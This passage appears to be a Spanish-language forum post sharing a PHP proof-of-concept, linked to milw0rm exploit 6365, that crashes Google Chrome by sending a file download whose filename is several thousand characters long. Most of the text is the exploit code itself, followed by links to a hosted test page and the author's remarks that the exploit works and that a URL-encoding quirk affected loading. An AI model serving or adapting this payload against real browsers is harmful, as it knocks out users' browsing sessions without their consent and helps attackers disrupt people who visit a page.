aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
$contenido = 'prueba';
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$nombre");
print($contenido);

/* 
http://www.jccharry.com/pruebas/Google%20Chrome/2.php
http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
http://milw0rm.com/exploits/6365
*/

?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo.
http://www.jccharry.com/pruebas/Google%20Chrome/
Hagan click en 2.php

[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado]

Esto no ha sido publicado en ningún otro lugar